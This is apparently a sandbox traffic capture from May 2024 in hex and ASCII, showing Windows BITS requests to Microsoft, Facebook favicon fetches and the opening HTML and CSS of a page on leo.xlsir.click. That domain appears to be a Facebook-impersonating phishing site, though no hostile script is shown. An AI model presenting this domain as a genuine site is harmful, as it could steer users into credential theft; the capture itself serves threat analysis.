2024-05-27 22:35:18 UTC	1369	IN	Data Raw: 58 0c 2d 2c 59 b5 b0 b0 b0 b0 b0 b0 b0 b0 18 5a 58 b2 6a 61 61 61 61 61 61 61 61 31 b4 b0 64 d5 c2 c2 c2 c2 c2 c2 c2 c2 62 68 61 c9 aa 85 85 85 85 85 85 85 85 c5 d0 c2 92 55 0b 0b 0b 0b 0b 0b 0b 0b 8b a1 85 25 ab 16 16 16 16 16 16 16 16 16 43 0b 4b 56 2d 2c 2c 2c 2c 2c 2c 2c 2c 86 16 96 ac 5a 58 58 58 58 58 58 58 58 0c 2d 3c dc 66 c8 74 13 1b 09 fa 5f c0 c2 c2 c2 c2 c2 c2 c2 c2 62 8f c3 2a ab 16 16 16 16 16 16 16 16 16 43 0b 4b 56 2d 2c 2c 2c 2c 2c 2c 2c 2c 86 16 96 ac 5a 58 58 58 58 58 58 58 58 0c 2d 6e bb cf ea e6 21 37 b1 8d 75 6c b5 b0 b0 b0 b0 b0 b0 b0 d8 cd 18 52 65 75 33 44 d5 c2 c2 c2 c2 c2 c2 c2 c2 62 b7 c3 ba 01 58 58 58 58 58 58 58 58 58 0c 2d 2c 59 b5 b0 b0 b0 b0 b0 b0 b0 b0 18 5a 58 b2 6a 61 61 61 61 61 61 61 61 31 b4 b8 fd 01 56 62 33 9b f0 Data Ascii: X-,YZXjaaaaaaaa1dbhaU%CKV-,,,,,,,,ZXXXXXXXX-<ft_b*CKV-,,,,,,,,ZXXXXXXXX-n!7ulReu3DbXXXXXXXXX-,YZXjaaaaaaaa1Vb3
2024-05-27 22:35:18 UTC	1369	IN	Data Raw: 0c fe b2 d8 52 48 dd 56 7c 4f 28 97 95 56 b3 8d 0b 17 2e e1 cc e9 33 38 7b ee 34 6a b5 55 e5 c6 c2 0f 89 2d 0c c2 3c df 54 66 ea 2a b7 3e 97 76 43 ed 4c 46 a8 8c 14 30 3e 3e 89 fd d3 87 71 f0 d0 21 1c 38 b0 9f da 52 41 2f f4 84 40 af 43 4a 74 8d 1a c8 fa 81 85 85 85 c5 ed 81 f8 07 9f dd 8e a4 3d 16 bb 17 1b 35 97 0d 26 2e 69 4c f5 1b 7d a4 be a2 89 9e 52 37 a5 36 e1 27 89 50 6a 29 ff dd 6e 13 f9 24 96 da 21 85 b2 15 93 5a 1a 47 68 76 88 40 3a 01 99 d7 85 22 ac 8e f0 14 f9 64 52 a5 2d f6 86 30 66 c4 cc 04 4f 69 22 26 b4 39 d4 a8 a5 89 ec d1 69 29 7b a6 4f de 86 fd 53 93 38 d1 57 26 b4 62 29 b3 30 fd 8c c0 12 a3 4d cd 35 2a 3f 55 b1 f6 3e c8 ee 3f 9b 43 66 aa ed ff 92 70 32 d3 bf fe 4f 07 84 99 0c 03 44 68 05 bd a4 39 17 87 ec ba 8e 4f 3f 89 ae e7 88 d8 4e Data Ascii: RHV\|O(V.38{4jU-<Tf>vCLF0>>q!8RA/@CJt=5&.iL}R76'Pj)n$!ZGhv@:"dR-0fOi"&9i){OS8W&b)0M5?U>?Cfp2ODh9O?N
2024-05-27 22:35:18 UTC	1369	IN	Data Raw: 6c b5 1d 4b 84 6c c6 27 76 15 26 0e 11 55 8e 38 26 65 ce 71 88 70 09 ed ff 98 6a 72 db 23 5c 42 45 f6 33 09 4d 22 6d f6 d4 06 7b 9e 80 39 9a df 51 13 ad 31 4c eb 30 20 a7 47 e6 ba 67 9c ba eb c8 d0 de f6 af 93 1b 10 ea 8c 39 f6 ee 5f 16 f1 2d 4c 5a 2e ce 4c e0 90 39 d9 73 99 a4 c6 28 11 59 2d 16 3c 94 8a 1e 2a 15 9f 54 58 60 bc d0 27 de 39 fa a1 72 d5 2e 8f 9e 33 fb 51 2a 8e 6c fc 5e 33 b7 10 c5 a7 fb 54 59 d1 3b cb 3d f7 8c b4 57 47 8a 34 91 2a 09 1a 2f 1a da ad 10 f3 0b f3 98 99 9f c7 dc fc 1c 56 56 57 55 64 ff e2 dc 1c 75 b4 0e 0a f1 12 e2 c6 2c 5a f3 17 11 af 2c 12 93 25 f2 ea 34 b4 cf 6a 5f d7 5d d7 07 fa 86 fb 9e df 29 f7 cb 80 ee 3b af 52 0a f0 8b 65 e4 47 0e c2 ab 1c a2 f5 62 80 88 16 93 31 e7 b4 a0 e7 e6 17 8b 78 f8 c1 57 e0 91 d7 bf 01 e3 e3 e3 Data Ascii: lKl'v&U8&eqpjr#\BE3M"m{9Q1L0 Gg9_-LZ.L9s(Y-<TX`'9r.3Ql^3TY;=WG4*/VVWUdu,Z,%4j_]);ReGb1xW
2024-05-27 22:35:18 UTC	1369	IN	Data Raw: ea 74 4f ac 9a 10 39 48 55 b4 8b 56 4c 97 c9 bc bf d8 8c d1 6a 71 d4 7e a8 26 c0 94 53 d9 38 ba 9a 4d a2 92 f7 93 c9 3f 21 6a 92 88 5e a0 15 47 93 f3 64 26 59 41 65 b7 00 9d e2 a8 47 38 74 9a 1b e6 b6 22 1d e4 16 7a 3f 6b b9 a8 d8 38 c8 66 9d f3 1d 6e e5 2e 6d b0 bf 41 4d cf 62 2d ba 4e ab a6 de 43 9f 42 9e e5 dc 44 ff df 5c 1d cc 51 41 79 cc 40 a5 13 90 f9 38 45 bd 46 14 b6 29 71 79 be 8d bc 1f 61 bc e4 a1 3a 92 a7 97 83 52 89 c8 6c a0 cb c8 0a 93 03 8d a3 d1 45 e6 87 90 1d 45 9a 22 0c 03 2e 05 bd 47 3a dc cf 51 a7 60 93 aa 04 ea b9 f3 e7 f0 8d c7 1e 43 ab d1 50 29 a8 0a 0e 2d fd ea cb 68 2d 5c 22 62 38 0b 92 50 69 e3 65 15 38 a5 89 7c aa 7d 4c 1d 6d ae d7 56 f7 b8 ab 78 df f0 b9 64 fe 1d 8a eb 3a 3d 85 55 fd db cb a8 c1 ef b8 c9 2a 91 e9 10 9d 19 76 0f Data Ascii: tO9HUVLjq~&S8M?!j^Gd&YAeG8t"z?k8fn.mAMb-NCBD\QAy@8EF)qya:RlEE".G:Q`CP)-h-\"b8Pie8\|}LmVxd:=U*v
2024-05-27 22:35:18 UTC	1369	IN	Data Raw: a3 b8 61 1a 7a 6b 24 41 6c 21 cb d8 ca 7d ed 5e 6c 57 52 bb b4 ab 0c 3a dd 83 c8 ee c2 c8 59 c7 c5 54 9b 4d c8 02 e0 14 48 d0 cb 21 8a 62 5c a4 36 3f bb d2 41 90 8b 51 19 71 31 4a a4 75 5f e0 61 a4 e0 c0 f7 75 f0 97 e3 a6 ca a7 95 5b aa ab 0a 14 e8 bd aa 62 a4 83 29 9e b0 fd e0 4b 8d a2 04 cf 3c f3 1c 56 56 96 e1 91 62 ec 92 29 bd 41 e6 7f 59 bf ac c8 a0 2e 09 dc 53 21 65 56 26 75 60 7d 78 b3 5c 35 5b 88 0e be 2b 6f c6 b1 d4 24 67 d6 bb 73 f4 e0 10 47 48 c3 79 9c 7a fc 51 3c 8a 16 de f1 f1 5f 44 f5 f0 6b 54 a6 01 56 d6 1d d9 5b 90 ac 5b 8b 5b 58 58 58 5c 05 96 ac 0e 39 74 9a a9 54 13 56 15 5f e1 2a 81 94 27 dc f9 d5 04 cb ab 1d 9a f8 42 22 ac 3c 4f 10 99 15 a4 60 08 5f a9 31 09 4d 40 5c 9e 94 cd 88 5c d2 54 95 35 4d 52 15 14 25 4d 49 53 f4 99 18 bb 3e 71 Data Ascii: azk$Al!}^lWR:YTMH!b\6?AQq1Ju_au[b)K<VVb)AY.S!eV&u`}x\5[+o$gsGHyzQ<_DkTV[[[XXX\9tTV_*'B"<O`_1M@\\T5MR%MIS>q
2024-05-27 22:35:18 UTC	1369	IN	Data Raw: e3 3e ed 73 7e 55 22 a1 3e 22 45 3e e3 fa 2c d2 d6 8a 21 aa 0c 47 6d c7 4b d1 24 e3 e0 69 07 05 11 e2 55 f7 8e e3 27 3e f8 e3 78 ff db df 8c 7b 0e 4d d1 fb 21 46 8b 77 e3 b7 a7 4a 98 5b 59 52 d5 a3 44 9f 67 eb 50 40 f4 bb 32 28 06 8b ce e2 25 7c e3 8b bf 8f fd 77 1f c3 e8 f1 57 12 19 2f 0e 7d c5 31 0b 0b 8b e1 80 cd d4 3c 64 90 42 e7 58 e4 21 3c ef 09 4c 57 3d 54 02 89 46 bd 8d 46 23 45 ab 49 13 6c 28 14 51 cd 6a 8c 6f 94 62 a8 7f 0a 50 15 a7 fa 36 ca fe 5e f3 82 dc f8 fd 35 db 58 58 ec 2c 28 97 98 14 6b 2a c5 72 7e 00 a6 8d 9c fb 33 41 1e 61 24 b6 8d a8 66 60 17 d9 87 ee 3d 8a a9 32 a9 bc ab e7 88 b8 5d 00 e2 f6 c0 56 9c 5a 2e 52 ca 6a 8e d4 d7 07 0f 8d e0 1f fe b7 3f 8d df f8 97 ff 00 bf fc d3 6f c5 7d 07 04 dc ce 45 04 e9 22 0e 4e e4 f1 ee 37 be 0a be Data Ascii: >s~U">"E>,!GmK$iU'>x{M!FwJ[YRDgP@2(%\|wW/}1<dBX!<LW=TFF#EIl(QjobP6^5XX,(k*r~3Aa$f`=2]VZ.Rj?o}E"N7
2024-05-27 22:35:18 UTC	1369	IN	Data Raw: c2 62 a8 61 c9 aa 85 85 82 dc f0 a5 d3 ed 10 c1 4c c9 6c 99 1a 12 4a 0a 96 2b 43 04 a9 7e 71 62 76 4f b6 95 59 d3 45 48 9f 45 44 48 42 da 8e 88 89 68 d1 ab 0e c7 a9 13 bf 68 50 8f eb 68 82 eb 98 4a 4b a4 94 31 81 75 cd cb 31 04 d6 62 b7 21 0b 8e 62 7f d4 54 91 d3 37 bf f2 2e 7c f8 9d 6f a0 bf 43 95 db ca e9 8f 2e 12 72 c3 76 20 fa 4b 71 11 3c c7 45 8e be fb ca 7b 8e e0 4d af b8 0b 01 b5 43 76 2f 50 47 1c 72 a5 5e d3 d2 14 ed da 22 9e ff e1 77 54 21 04 ee 0b 76 e1 66 61 61 31 08 9b ba ca c2 42 61 3d 39 20 6e 4a 24 d3 41 92 c4 f0 3c 17 69 92 42 12 31 75 49 11 0b dc 36 3c d1 56 49 da f3 fc 9e ab a3 43 a4 29 b6 90 32 21 f1 b8 ac 83 40 14 12 79 10 39 d4 22 da 87 57 46 3b f6 11 a7 3e 3c 97 4c bf 42 76 57 8c 2a eb a6 d4 21 d3 d6 25 60 77 41 93 54 ed 46 ea 12 99 Data Ascii: baLlJ+C~qbvOYEHEDHBhhPhJK1u1b!bT7.\|oC.rv Kq<E{MCv/PGr^"wT!vfaa1Ba=9 nJ$A<iB1uI6<VIC)2!@y9"WF;><LBvW*!%`wATF
2024-05-27 22:35:18 UTC	1369	IN	Data Raw: c2 7b f1 d2 99 ff 82 f3 8b 11 84 36 05 40 e9 bb 34 9e a4 42 0c 8d ba ca 27 92 a6 ba 1f 42 c6 38 79 f2 69 dc ff c6 77 c0 f3 3c b5 50 b7 4d de c2 c2 82 e1 be ed 17 ff d1 3f 82 c5 50 a1 7f fe 64 77 c8 3a 59 0b cf cf b3 06 b8 76 6d 61 03 70 36 0f d1 35 7f f6 52 52 71 24 b2 97 2c e1 f8 68 1d 1f 79 95 8f bf fb 13 93 f8 f1 07 3d 1c af 02 65 a1 57 72 62 4d 69 76 d1 4d d1 be 66 16 ed 67 a3 1b 3d 93 75 2e 82 a2 2f cd 3b 54 80 0c 89 bb 20 a1 15 79 3a e8 81 31 17 af bb af 88 bb a6 8b 88 9b 4d cc ac 74 d0 66 93 ee c0 8e e4 35 0e 69 71 75 f4 fa 97 84 27 5a 38 b2 3f 40 39 e7 19 9f f0 ad 8f eb 51 86 ee 38 44 5a 9b c1 5d c5 26 3e fe fa 03 28 3a 6d e5 af ca 95 ac a4 30 49 fe d1 ff 2c 6f e4 e9 ca be 04 aa a9 52 ff f7 4d 8f a3 54 2d e2 5b df ff 01 d8 07 5b a4 89 72 73 e1 d0 Data Ascii: {6@4B'B8yiw<PM?Pdw:Yvmap65RRq$,hy=eWrbMivMfg=u./;T y:1Mtf5iqu'Z8?@9Q8DZ]&>(:m0I,oRMT-[[rs
2024-05-27 22:35:18 UTC	1369	IN	Data Raw: 8b 10 5a 08 09 5a b4 24 9e 7a 85 6d a1 22 ea 5d b7 83 71 b2 1c fc ec 07 de 88 5a b3 83 7f f9 9b 9f c7 52 44 5b 93 ca cb d7 2e 07 49 ea 9d 8e da a3 05 dd d2 c2 3c e2 38 de fc a5 5b 58 58 ec 7a 58 b2 7a 53 d8 6e b3 ab a1 2c 52 fb 71 29 33 a5 dc 60 62 b1 76 b2 35 c8 c4 d1 54 18 35 4b a9 97 44 40 65 42 ea e4 12 1e 39 de c6 5f 7a f7 21 1c ad 0a e4 d9 67 10 6e 37 c6 43 13 d5 d4 98 5c 05 12 47 d7 5e 4f b9 32 95 2b 0c 95 05 5a f4 4f ad 0d cc 2c b6 f1 fc e9 05 9c bb 52 c3 c9 2b 0d 2c af 36 51 ab d5 88 38 6a 9f c0 24 74 11 e4 5d 8c 8e 16 b1 ff e0 18 8e 4c 97 70 ef 54 11 77 1d 1a c7 81 31 1f 64 7d 06 59 f7 e1 49 ed 5d 90 f9 d6 32 58 7f cd 54 55 a0 47 5d 99 d0 8c d1 7b 6f 3d ec 22 fd f0 18 fe 8f 4f cf e2 85 cb 02 8d d4 23 92 9c 2a ff d7 6e 3d 75 cb 5a 37 0d a5 62 73 Data Ascii: ZZ$zm"]qZRD[.I<8[XXzXzSn,Rq)3`bv5T5KD@eB9_z!gn7C\G^O2+ZO,R+,6Q8j$t]LpTw1d}YI]2XTUG]{o="O#*n=uZ7bs

Timestamp	Bytes transferred	Direction	Data
2024-05-27 22:35:18 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-05-27 22:35:18 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=149659 Date: Mon, 27 May 2024 22:35:18 GMT Connection: close X-CID: 2

Timestamp	Bytes transferred	Direction	Data
2024-05-27 22:35:19 UTC	607	OUT	GET /rsrc.php/yb/r/hLRJ1GG_y0J.ico HTTP/1.1 Host: static.xx.fbcdn.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://leo.xlsir.click/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-27 22:35:19 UTC	1916	IN	HTTP/1.1 200 OK Content-Type: image/x-icon Access-Control-Allow-Origin: * Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT content-md5: jN3KQn2um5Jec0MvhzPgWg== Expires: Sun, 25 May 2025 00:12:21 GMT Cache-Control: public,max-age=31536000,immutable reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/" timing-allow-origin: * document-policy: force-load-at-top permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), battery=(self), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), usb-unrestricted=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy" cross-origin-resource-policy: cross-origin X-Content-Type-Options: nosniff report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"} origin-agent-cluster: ?0 X-FB-Debug: yfnvodXkxliJna3fVzo5/jBX1Ck5a1nrDH7v/RugkovzPig9wgkPR13QTFS0wYjREojJHA5+eKHxj3vwfEBcGQ== Date: Mon, 27 May 2024 22:35:19 GMT X-FB-Connection-Quality: GOOD; q=0.7, rtt=97, rtx=0, c=14, mss=1392, tbw=3409, tp=-1, tpl=-1, uplat=0, ullat=-1 Alt-Svc: h3=":443"; ma=86400 Connection: close Content-Length: 4286
2024-05-27 22:35:19 UTC	1	IN	Data Raw: 00 Data Ascii:
2024-05-27 22:35:19 UTC	4285	IN	Data Raw: 00 01 00 01 00 20 20 00 00 01 00 20 00 a8 10 00 00 16 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 00 10 00 00 c2 1e 00 00 c2 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 80 00 06 e2 65 04 47 e0 63 00 95 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff e0 64 00 bf e0 63 00 95 e2 65 00 47 ff 80 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ea 6a 0b 18 e2 66 02 96 e1 66 01 f1 e2 66 01 ff e1 65 01 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: ( @ eGcdceGjfffe

Timestamp	Bytes transferred	Direction	Data
2024-05-27 22:35:19 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-05-27 22:35:19 UTC	535	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y= Cache-Control: public, max-age=149707 Date: Mon, 27 May 2024 22:35:19 GMT Content-Length: 55 Connection: close X-CID: 2
2024-05-27 22:35:19 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Timestamp	Bytes transferred	Direction	Data
2024-05-27 22:35:20 UTC	372	OUT	GET /rsrc.php/yb/r/hLRJ1GG_y0J.ico HTTP/1.1 Host: static.xx.fbcdn.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-27 22:35:20 UTC	1916	IN	HTTP/1.1 200 OK Content-Type: image/x-icon Access-Control-Allow-Origin: * Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT content-md5: jN3KQn2um5Jec0MvhzPgWg== Expires: Sat, 24 May 2025 06:58:33 GMT Cache-Control: public,max-age=31536000,immutable reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/" timing-allow-origin: * document-policy: force-load-at-top permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), battery=(self), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), usb-unrestricted=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy" cross-origin-resource-policy: cross-origin X-Content-Type-Options: nosniff report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"} origin-agent-cluster: ?0 X-FB-Debug: qz0o70Sk4nbN1eBesKL4FhsWtX5Xf/8NvX/E+1WTk7ueEHKYFkWI8AxGlhFm33VxhaOCXIid7JHBx+20ZsdPXg== Date: Mon, 27 May 2024 22:35:20 GMT X-FB-Connection-Quality: GOOD; q=0.7, rtt=91, rtx=0, c=14, mss=1392, tbw=3409, tp=-1, tpl=-1, uplat=0, ullat=-1 Alt-Svc: h3=":443"; ma=86400 Connection: close Content-Length: 4286
2024-05-27 22:35:20 UTC	1	IN	Data Raw: 00 Data Ascii:
2024-05-27 22:35:20 UTC	4285	IN	Data Raw: 00 01 00 01 00 20 20 00 00 01 00 20 00 a8 10 00 00 16 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 00 10 00 00 c2 1e 00 00 c2 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 80 00 06 e2 65 04 47 e0 63 00 95 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff e0 64 00 bf e0 63 00 95 e2 65 00 47 ff 80 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ea 6a 0b 18 e2 66 02 96 e1 66 01 f1 e2 66 01 ff e1 65 01 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: ( @ eGcdceGjfffe

Timestamp	Bytes transferred	Direction	Data
2024-05-27 22:35:27 UTC	646	OUT	GET /home.php HTTP/1.1 Host: leo.xlsir.click Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-27 22:35:29 UTC	717	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 22:35:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding x-powered-by: DLEMP x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XXgfKsEVft7JJKpSLFrn9rBR2GUH61nF8fmCdgAF%2FydhFn5DacwNxyeAqWfiU%2BPpZTzI1SjUDkta9gcNeELS2w%2BpxVXDore0TQK7wd125JZmwVo3DB%2B4ZrRKX%2Bc8wKqQbkk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a97a690e60c425-EWR alt-svc: h3=":443"; ma=86400
2024-05-27 22:35:29 UTC	652	IN	Data Raw: 37 63 65 33 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 37 2e 31 2e 6d 69 6e 2e 6a 73 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 32 35 36 2d 2f 4a 71 54 33 53 51 66 61 77 52 63 76 2f 42 49 48 50 54 68 6b 42 76 73 30 4f 45 76 74 46 46 6d 71 50 46 2f 6c 59 49 2f 43 78 6f 3d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 64 61 74 61 2d 72 63 Data Ascii: 7ce3<html lang="en"><head><meta name="robots" content="noindex"> <script src="https://code.jquery.com/jquery-3.7.1.min.js" integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo=" crossorigin="anonymous"></script> <style data-rc
2024-05-27 22:35:29 UTC	1369	IN	Data Raw: 61 73 65 64 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 67 72 61 79 73 63 61 6c 65 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 61 6e 74 69 63 6f 6e 3e 2a 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 61 6e 74 69 63 6f 6e 20 73 76 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 61 6e 74 69 63 6f 6e 3a 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 Data Ascii: ased; -moz-osx-font-smoothing: grayscale; } .anticon>* { line-height: 1; } .anticon svg { display: inline-block; } .anticon::before { display:
2024-05-27 22:35:29 UTC	1369	IN	Data Raw: 73 61 6e 73 2d 73 65 72 69 66 2c 20 27 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 27 2c 20 27 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 27 2c 20 27 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 27 2c 20 27 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 27 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3a 77 68 65 72 65 28 2e 63 73 73 2d 31 38 69 69 6b 6b 62 29 5b 63 6c 61 73 73 5e 3d 22 61 6e 74 2d 66 6f 72 6d 22 5d 3a 3a 62 65 66 6f 72 65 2c 0d 0a 20 20 20 20 20 20 20 20 3a 77 68 65 72 65 28 2e 63 73 73 2d 31 38 69 69 6b 6b Data Ascii: sans-serif, 'Apple Color Emoji', 'Segoe UI Emoji', 'Segoe UI Symbol', 'Noto Color Emoji'; font-size: 14px; box-sizing: border-box; } :where(.css-18iikkb)[class^="ant-form"]::before, :where(.css-18iikk
